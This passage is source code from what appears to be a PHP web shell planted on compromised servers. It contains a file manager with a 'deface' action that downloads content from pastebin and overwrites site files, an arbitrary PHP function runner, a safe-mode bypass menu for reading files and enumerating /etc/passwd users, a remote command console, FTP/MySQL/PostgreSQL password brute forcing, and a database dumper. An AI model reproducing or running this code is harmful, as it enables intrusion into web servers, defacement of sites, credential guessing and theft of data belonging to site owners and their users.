637. $_SESSION['f'][$k] = urldecode($f);
638. $_SESSION['cwd'] = @$_POST['c'];
639. }
640. break;
641. }
642. echo '<script>document.mf.p1.value="";document.mf.p2.value="";</script>';
643. }
644. if(isset($_POST['p1']) && $_POST['p1']=='deface') {
645. $def = file_get_contents('http://pastebin.com/download.php?i=f8T6tQse');
646. file_put_contents($_POST['c'].$_POST['p2'],$def);
647. }
648. $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
649. if($dirContent === false) { echo 'Can\'t open this folder!'; return; }
650. global $sort;
651. $sort = array('name', 1);
652. if(!empty($_POST['p1'])) {
653. if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
654. $sort = array($match[1], (int)$match[2]);
655. }
656. echo '<script>
657. function sa() {
658. for(i=0;i<document.files.elements.length;i++)
659. if(document.files.elements[i].type == \'checkbox\')
660. document.files.elements[i].checked = document.files.elements[0].checked;
661. }
662. </script>
663. <table width=\'100%\' class=\'main\' cellspacing=\'0\' cellpadding=\'2\'>
664. <form name=files method=post>';
665. echo "<tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
666. $dirs = $files = $links = array();
667. $n = count($dirContent);
668. for($i=0;$i<$n;$i++) {
669. $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
670. $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
671. $tmp = array('name' => $dirContent[$i],
672. 'path' => $GLOBALS['cwd'].$dirContent[$i],
673. 'modify' => @date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])),
674. 'perms' => viewPermsColor($GLOBALS['cwd'].$dirContent[$i]),
675. 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
676. 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
677. 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
678. );
679. if(@is_file($GLOBALS['cwd'].$dirContent[$i]))
680. $files[] = array_merge($tmp, array('type' => 'file'));
681. elseif(@is_link($GLOBALS['cwd'].$dirContent[$i]))
682. $links[] = array_merge($tmp, array('type' => 'link'));
683. elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&& ($dirContent[$i] != "."))
684. $dirs[] = array_merge($tmp, array('type' => 'dir'));
685. }
686. $GLOBALS['sort'] = $sort;
687. function cmp($a, $b) {
688. if($GLOBALS['sort'][0] != 'size')
689. return strcmp($a[$GLOBALS['sort'][0]], $b[$GLOBALS['sort'][0]])*($GLOBALS['sort'][1]?1:-1);
690. else
691. return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
692. }
693. usort($files, "cmp");
694. usort($dirs, "cmp");
695. usort($links, "cmp");
696. $files = array_merge($dirs, $links, $files);
697. $l = 0;
698. foreach($files as $f) {
699. echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');"><b>[ '.htmlspecialchars($f['name']).' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
700. .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
701. $l = $l?0:1;
702. }
703. echo '<tr><td colspan=5>
704. <input type=hidden name=a value=\'FilesMan\'>
705. <input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">
706. <input type=hidden name=charset value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
707. <select name=\'p1\'><option value=\'copy\'>Copy</option><option value=\'move\'>Move</option><option value=\'delete\'>Delete</option>';
708. if(!empty($_SESSION['act'])&&@count($_SESSION['f'])){echo '<option value=\'paste\'>Paste</option>'; }
709. echo '</select>&nbsp;<input type="submit" value=">>"></td><td colspan="2" align="right" width="1"><input name="def" id="def" value="index.php" size="10"/>&nbsp;<input type="button" onclick="g(\'FilesMan\',\''.htmlspecialchars($GLOBALS['cwd']).'\',\'deface\',document.getElementById(\'def\').value)" value="Add your Deface"></td></tr>
710. </form></table></div>';
711. printFooter();
712. }
713.  
714. function actionStringTools() {
715. if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
716. if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
717. if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= dechex(ord($p[$i]));return strtoupper($r);}}
718. if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
719.  
720. if(isset($_POST['ajax'])) {
721. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
722. ob_start();
723. if(function_exists($_POST['p1']))
724. echo $_POST['p1']($_POST['p2']);
725. $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
726. echo strlen($temp), "\n", $temp;
727. exit;
728. }
729. printHeader();
730. echo '<h1>String conversions</h1><div class=content>';
731. $stringTools = array(
732. 'Base64 encode' => 'base64_encode',
733. 'Base64 decode' => 'base64_decode',
734. 'Url encode' => 'urlencode',
735. 'Url decode' => 'urldecode',
736. 'Full urlencode' => 'full_urlencode',
737. 'md5 hash' => 'md5',
738. 'sha1 hash' => 'sha1',
739. 'crypt' => 'crypt',
740. 'CRC32' => 'crc32',
741. 'ASCII to HEX' => 'ascii2hex',
742. 'HEX to ASCII' => 'hex2ascii',
743. 'HEX to DEC' => 'hexdec',
744. 'HEX to BIN' => 'hex2bin',
745. 'DEC to HEX' => 'dechex',
746. 'DEC to BIN' => 'decbin',
747. 'BIN to HEX' => 'bin2hex',
748. 'BIN to DEC' => 'bindec',
749. 'String to lower case' => 'strtolower',
750. 'String to upper case' => 'strtoupper',
751. 'Htmlspecialchars' => 'htmlspecialchars',
752. 'String length' => 'strlen',
753. );
754. if(empty($_POST['ajax'])&&!empty($_POST['p1']))
755. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
756. echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
757. foreach($stringTools as $k => $v)
758. echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
759. echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".htmlspecialchars(@$_POST['p2'])."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
760. if(!empty($_POST['p1'])) {
761. if(function_exists($_POST['p1']))
762. echo htmlspecialchars($_POST['p1']($_POST['p2']));
763. }
764. echo"</pre></div>";
765. printFooter();
766. }
767.  
768. function actionFilesTools() {
769. if( isset($_POST['p1']) )
770. $_POST['p1'] = urldecode($_POST['p1']);
771. if(@$_POST['p2']=='download') {
772. if(is_file($_POST['p1']) && is_readable($_POST['p1'])) {
773. ob_start("ob_gzhandler", 4096);
774. header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
775. if (function_exists("mime_content_type")) {
776. $type = @mime_content_type($_POST['p1']);
777. header("Content-Type: ".$type);
778. }
779. $fp = @fopen($_POST['p1'], "r");
780. if($fp) {
781. while(!@feof($fp))
782. echo @fread($fp, 1024);
783. fclose($fp);
784. }
785. } elseif(is_dir($_POST['p1']) && is_readable($_POST['p1'])) {
786.  
787. }
788. exit;
789. }
790. if( @$_POST['p2'] == 'mkfile' ) {
791. if(!file_exists($_POST['p1'])) {
792. $fp = @fopen($_POST['p1'], 'w');
793. if($fp) {
794. $_POST['p2'] = "edit";
795. fclose($fp);
796. }
797. }
798. }
799. printHeader();
800. echo '<h1>File tools</h1><div class=content>';
801. if( !file_exists(@$_POST['p1']) ) {
802. echo 'File not exists';
803. printFooter();
804. return;
805. }
806. $uid = @posix_getpwuid(@fileowner($_POST['p1']));
807. $gid = @posix_getgrgid(@fileowner($_POST['p1']));
808. echo '<span>Name:</span> '.htmlspecialchars($_POST['p1']).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
809. echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
810. if( empty($_POST['p2']) )
811. $_POST['p2'] = 'view';
812. if( is_file($_POST['p1']) )
813. $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
814. else
815. $m = array('Chmod', 'Rename', 'Touch');
816. foreach($m as $v)
817. echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
818. echo '<br><br>';
819. switch($_POST['p2']) {
820. case 'view':
821. echo '<pre class=ml1>';
822. $fp = @fopen($_POST['p1'], 'r');
823. if($fp) {
824. while( !@feof($fp) )
825. echo htmlspecialchars(@fread($fp, 1024));
826. @fclose($fp);
827. }
828. echo '</pre>';
829. break;
830. case 'highlight':
831. if( is_readable($_POST['p1']) ) {
832. echo '<div class=ml1 style="background-color: #430303;color:black;">';
833. $code = highlight_file($_POST['p1'],true);
834. echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
835. }
836. break;
837. case 'chmod':
838. if( !empty($_POST['p3']) ) {
839. $perms = 0;
840. for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
841. $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
842. if(!@chmod($_POST['p1'], $perms))
843. echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
844. else
845. die('<script>g(null,null,null,null,"")</script>');
846. }
847. echo '<form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
848. break;
849. case 'edit':
850. if( !is_writable($_POST['p1'])) {
851. echo 'File isn\'t writeable';
852. break;
853. }
854. if( !empty($_POST['p3']) ) {
855. @file_put_contents($_POST['p1'],$_POST['p3']);
856. echo 'Saved!<br><script>document.mf.p3.value="";</script>';
857. }
858. echo '<form onsubmit="g(null,null,null,null,this.text.value);return false;"><textarea name=text class=bigarea>';
859. $fp = @fopen($_POST['p1'], 'r');
860. if($fp) {
861. while( !@feof($fp) )
862. echo htmlspecialchars(@fread($fp, 1024));
863. @fclose($fp);
864. }
865. echo '</textarea><input type=submit value=">>"></form>';
866. break;
867. case 'hexdump':
868. $c = @file_get_contents($_POST['p1']);
869. $n = 0;
870. $h = array('00000000<br>','','');
871. $len = strlen($c);
872. for ($i=0; $i<$len; ++$i) {
873. $h[1] .= sprintf('%02X',ord($c[$i])).' ';
874. switch ( ord($c[$i]) ) {
875. case 0: $h[2] .= ' '; break;
876. case 9: $h[2] .= ' '; break;
877. case 10: $h[2] .= ' '; break;
878. case 13: $h[2] .= ' '; break;
879. default: $h[2] .= $c[$i]; break;
880. }
881. $n++;
882. if ($n == 32) {
883. $n = 0;
884. if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
885. $h[1] .= '<br>';
886. $h[2] .= "\n";
887. }
888. }
889. echo '<table cellspacing=1 cellpadding=5 bgcolor=#red><tr><td bgcolor=red><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#red><pre>'.$h[1].'</pre></td><td bgcolor=#red><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
890. break;
891. case 'rename':
892. if( !empty($_POST['p3']) ) {
893. if(!@rename($_POST['p1'], $_POST['p3']))
894. echo 'Can\'t rename!<br><script>document.mf.p3.value="";</script>';
895. else
896. die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
897. }
898. echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
899. break;
900. case 'touch':
901. if( !empty($_POST['p3']) ) {
902. $time = strtotime($_POST['p3']);
903. if($time) {
904. if(@touch($_POST['p1'],$time,$time))
905. die('<script>g(null,null,null,null,"")</script>');
906. else {
907. echo 'Fail!<script>document.mf.p3.value="";</script>';
908. }
909. } else echo 'Bad time format!<script>document.mf.p3.value="";</script>';
910. }
911. echo '<form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
912. break;
913. case 'mkfile':
914.  
915. break;
916. }
917. echo '</div>';
918. printFooter();
919. }
920.  
921. function actionSafeMode() {
922. $temp='';
923. ob_start();
924. switch($_POST['p1']) {
925. case 1:
926. $temp=@tempnam($test, 'cx');
927. if(@copy("compress.zlib://".$_POST['p2'], $temp)){
928. echo @file_get_contents($temp);
929. unlink($temp);
930. } else
931. echo 'Sorry... Can\'t open file';
932. break;
933. case 2:
934. $files = glob($_POST['p2'].'*');
935. if( is_array($files) )
936. foreach ($files as $filename)
937. echo $filename."\n";
938. break;
939. case 3:
940. $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH);
941. curl_exec($ch);
942. break;
943. case 4:
944. ini_restore("safe_mode");
945. ini_restore("open_basedir");
946. include($_POST['p2']);
947. break;
948. case 5:
949. for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
950. $uid = @posix_getpwuid($_POST['p2']);
951. if ($uid)
952. echo join(':',$uid)."\n";
953. }
954. break;
955. case 6:
956. if(!function_exists('imap_open'))break;
957. $stream = imap_open($_POST['p2'], "", "");
958. if ($stream == FALSE)
959. break;
960. echo imap_body($stream, 1);
961. imap_close($stream);
962. break;
963. }
964. $temp = ob_get_clean();
965. printHeader();
966. echo '<h1>Safe mode bypass</h1><div class=content>';
967. echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form>';
968. if($temp)
969. echo '<pre class="ml1" style="margin-top:5px" id="Output">'.$temp.'</pre>';
970. echo '</div>';
971. printFooter();
972. }
973.  
974. function actionConsole() {
975. if(isset($_POST['ajax'])) {
976. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
977. ob_start();
978. echo "document.cf.cmd.value='';\n";
979. $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\\'\0"));
980. if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) {
981. if(@chdir($match[1])) {
982. $GLOBALS['cwd'] = @getcwd();
983. echo "document.mf.c.value='".$GLOBALS['cwd']."';";
984. }
985. }
986. echo "document.cf.output.value+='".$temp."';";
987. echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;";
988. $temp = ob_get_clean();
989. echo strlen($temp), "\n", $temp;
990. exit;
991. }
992. printHeader();
993.  
994. echo '<script>
995. if(window.Event) window.captureEvents(Event.KEYDOWN);
996. var cmds = new Array("");
997. var cur = 0;
998. function kp(e) {
999. var n = (window.Event) ? e.which : e.keyCode;
1000. if(n == 38) {
1001. cur--;
1002. if(cur>=0)
1003. document.cf.cmd.value = cmds[cur];
1004. else
1005. cur++;
1006. } else if(n == 40) {
1007. cur++;
1008. if(cur < cmds.length)
1009. document.cf.cmd.value = cmds[cur];
1010. else
1011. cur--;
1012. }
1013. }
1014. function add(cmd) {
1015. cmds.pop();
1016. cmds.push(cmd);
1017. cmds.push("");
1018. cur = cmds.length-1;
1019. }
1020. </script>';
1021. echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\'clear\'){document.cf.output.value=\'\';document.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value);}else{g(null,null,this.cmd.value);} return false;"><select name=alias>';
1022. foreach($GLOBALS['aliases'] as $n => $v) {
1023. if($v == '') {
1024. echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
1025. continue;
1026. }
1027. echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
1028. }
1029. if(empty($_POST['ajax'])&&!empty($_POST['p1']))
1030. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
1031. echo '</select><input type=button onclick="add(document.cf.alias.value);if(document.cf.ajax.checked){a(null,null,document.cf.alias.value);}else{g(null,null,document.cf.alias.value);}" value=">>"> <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX<br/><textarea class=bigarea name=output style="border-bottom:0;" readonly>';
1032. if(!empty($_POST['p1'])) {
1033. echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1']));
1034. }
1035. echo '</textarea><input type=text name=cmd style="border-top:0;width:100%;" onkeydown="kp(event);">';
1036. echo '</form></div><script>document.cf.cmd.focus();</script>';
1037. printFooter();
1038. }
1039.  
1040. function actionLogout() {
1041. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
1042. echo '<title>Get out Now</title><body bgcolor=#000000><center><img src="http://i59.tinypic.com/1zx9mbb.gif"><br>
1043. <style type="text/css">body, a:hover {cursor: url(http://cur.cursors-4u.net/cursors/cur-11/cur1054.cur), progress !important;}</style><a href="http://www.cursors-4u.com/cursor/2012/02/11/chrome-pointer.html" target="_blank" title="Chrome Pointer"><img src="http://cur.cursors-4u.net/cursor.png" border="0" alt="Chrome Pointer" style="position:absolute; top: 0px; right: 0px;" /></a>
1044. <span style="color:red;font: 20pt audiowide;text-shadow: 0 0 4px white, 0px 0px 10px red">Your are out now :D<br></h2></span></center></body>';
1045. }
1046.  
1047. function actionSelfRemove() {
1048. printHeader();
1049. if($_POST['p1'] == 'yes') {
1050. if(@unlink(SELF_PATH))
1051. die('Shell has been removed');
1052. else
1053. echo 'unlink error!';
1054. }
1055. echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
1056. printFooter();
1057. }
1058.  
1059. function actionBruteforce() {
1060. printHeader();
1061. if( isset($_POST['proto']) ) {
1062. echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
1063. if( $_POST['proto'] == 'ftp' ) {
1064. function bruteForce($ip,$port,$login,$pass) {
1065. $fp = @ftp_connect($ip, $port?$port:21);
1066. if(!$fp) return false;
1067. $res = @ftp_login($fp, $login, $pass);
1068. @ftp_close($fp);
1069. return $res;
1070. }
1071. } elseif( $_POST['proto'] == 'mysql' ) {
1072. function bruteForce($ip,$port,$login,$pass) {
1073. $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
1074. @mysql_close($res);
1075. return $res;
1076. }
1077. } elseif( $_POST['proto'] == 'pgsql' ) {
1078. function bruteForce($ip,$port,$login,$pass) {
1079. $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=''";
1080. $res = @pg_connect($server[0].':'.$server[1]?$server[1]:5432, $login, $pass);
1081. @pg_close($res);
1082. return $res;
1083. }
1084. }
1085. $success = 0;
1086. $attempts = 0;
1087. $server = explode(":", $_POST['server']);
1088. if($_POST['type'] == 1) {
1089. $temp = @file('/etc/passwd');
1090. if( is_array($temp) )
1091. foreach($temp as $line) {
1092. $line = explode(":", $line);
1093. ++$attempts;
1094. if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
1095. $success++;
1096. echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
1097. }
1098. if(@$_POST['reverse']) {
1099. $tmp = "";
1100. for($i=strlen($line[0])-1; $i>=0; --$i)
1101. $tmp .= $line[0][$i];
1102. ++$attempts;
1103. if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
1104. $success++;
1105. echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
1106. }
1107. }
1108. }
1109. } elseif($_POST['type'] == 2) {
1110. $temp = @file($_POST['dict']);
1111. if( is_array($temp) )
1112. foreach($temp as $line) {
1113. $line = trim($line);
1114. ++$attempts;
1115. if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
1116. $success++;
1117. echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
1118. }
1119. }
1120. }
1121. echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
1122. }
1123. echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'
1124. .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'
1125. .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
1126. .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
1127. .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
1128. .'<span>Server:port</span></td>'
1129. .'<td><input type=text name=server value="127.0.0.1"></td></tr>'
1130. .'<tr><td><span>Brute type</span></td>'
1131. .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>'
1132. .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>'
1133. .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>'
1134. .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
1135. .'<td><input type=text name=login value="komsen"></td></tr>'
1136. .'<tr><td><span>Dictionary</span></td>'
1137. .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
1138. .'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
1139. echo '</div><br>';
1140. printFooter();
1141. }
1142.  
1143. function actionSql() {
1144. class DbClass {
1145. var $type;
1146. var $link;
1147. var $res;
1148. function DbClass($type) {
1149. $this->type = $type;
1150. }
1151. function connect($host, $user, $pass, $dbname){
1152. switch($this->type) {
1153. case 'mysql':
1154. if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
1155. break;
1156. case 'pgsql':
1157. $host = explode(':', $host);
1158. if(!$host[1]) $host[1]=5432;
1159. if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
1160. break;
1161. }
1162. return false;
1163. }
1164. function selectdb($db) {
1165. switch($this->type) {
1166. case 'mysql':
1167. if (@mysql_select_db($db))return true;
1168. break;
1169. }
1170. return false;
1171. }
1172. function query($str) {
1173. switch($this->type) {
1174. case 'mysql':
1175. return $this->res = @mysql_query($str);
1176. break;
1177. case 'pgsql':
1178. return $this->res = @pg_query($this->link,$str);
1179. break;
1180. }
1181. return false;
1182. }
1183. function fetch() {
1184. $res = func_num_args()?func_get_arg(0):$this->res;
1185. switch($this->type) {
1186. case 'mysql':
1187. return @mysql_fetch_assoc($res);
1188. break;
1189. case 'pgsql':
1190. return @pg_fetch_assoc($res);
1191. break;
1192. }
1193. return false;
1194. }
1195. function listDbs() {
1196. switch($this->type) {
1197. case 'mysql':
1198. return $this->res = @mysql_list_dbs($this->link);
1199. break;
1200. case 'pgsql':
1201. return $this->res = $this->query("SELECT datname FROM pg_database");
1202. break;
1203. }
1204. return false;
1205. }
1206. function listTables() {
1207. switch($this->type) {
1208. case 'mysql':
1209. return $this->res = $this->query('SHOW TABLES');
1210. break;
1211. case 'pgsql':
1212. return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != 'information_schema' AND table_schema != 'pg_catalog') or table_name = 'pg_user'");
1213. break;
1214. }
1215. return false;
1216. }
1217. function error() {
1218. switch($this->type) {
1219. case 'mysql':
1220. return @mysql_error($this->link);
1221. break;
1222. case 'pgsql':
1223. return @pg_last_error($this->link);
1224. break;
1225. }
1226. return false;
1227. }
1228. function setCharset($str) {
1229. switch($this->type) {
1230. case 'mysql':
1231. if(function_exists('mysql_set_charset'))
1232. return @mysql_set_charset($str, $this->link);
1233. else
1234. $this->query('SET CHARSET '.$str);
1235. break;
1236. case 'mysql':
1237. return @pg_set_client_encoding($this->link, $str);
1238. break;
1239. }
1240. return false;
1241. }
1242. function dump($table) {
1243. switch($this->type) {
1244. case 'mysql':
1245. $res = $this->query('SHOW CREATE TABLE `'.$table.'`');
1246. $create = mysql_fetch_array($res);
1247. echo $create[1].";\n\n";
1248. $this->query('SELECT * FROM `'.$table.'`');
1249. while($item = $this->fetch()) {
1250. $columns = array();
1251. foreach($item as $k=>$v) {
1252. $item[$k] = "'".@mysql_real_escape_string($v)."'";
1253. $columns[] = "`".$k."`";
1254. }
1255. echo 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
1256. }
1257. break;
1258. case 'pgsql':
1259. $this->query('SELECT * FROM '.$table);
1260. while($item = $this->fetch()) {
1261. $columns = array();
1262. foreach($item as $k=>$v) {
1263. $item[$k] = "'".addslashes($v)."'";
1264. $columns[] = $k;
1265. }
1266. echo 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
1267. }
1268. break;
1269. }
1270. return false;
1271. }
1272. };
1273. $db = new DbClass(@$_POST['type']);
1274. if(@$_POST['p2']=='download') {
1275. ob_start("ob_gzhandler", 4096);
1276. $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
1277. $db->selectdb($_POST['sql_base']);
1278. header("Content-Disposition: attachment; filename=dump.sql");
1279. header("Content-Type: text/plain");
1280. foreach($_POST['tbl'] as $v)
1281. $db->dump($v);
1282. exit;
1283. }
1284. printHeader();
1285. echo '<h1>Sql browser</h1><div class=content>
1286. <form name="sf" method="post">
1287. <table cellpadding="2" cellspacing="0">
1288. <tr>
1289. <td>Type</td>
1290. <td>Host</td>
1291. <td>Login</td>
1292. <td>Password</td>
1293. <td>Database</td>
1294. <td></td>
1295. </tr>
1296. <tr>
1297. <input type=hidden name=a value=Sql>
1298. <input type=hidden name=p1 value=\'query\'>
1299. <input type=hidden name=p2>
1300. <input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">
1301. <input type=hidden name=charset value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
1302. <td>
1303. <select name=\'type\'>
1304. <option value="mysql" '.(@$_POST['type']=='mysql'?'selected':'').'>MySql</option>
1305. <option value="pgsql" '.(@$_POST['type']=='pgsql'?'selected':'').'>PostgreSql</option>
1306. </select></td>
1307. <td><input type=text name=sql_host value="'.(empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])).'"></td>
1308. <td><input type=text name=sql_login value="'.(empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])).'"></td>
1309. <td><input type=text name=sql_pass value="'.(empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])).'"></td>
1310. <td>';
1311. $tmp = "<input type=text name=sql_base value=''>";
1312. if(isset($_POST['sql_host'])){
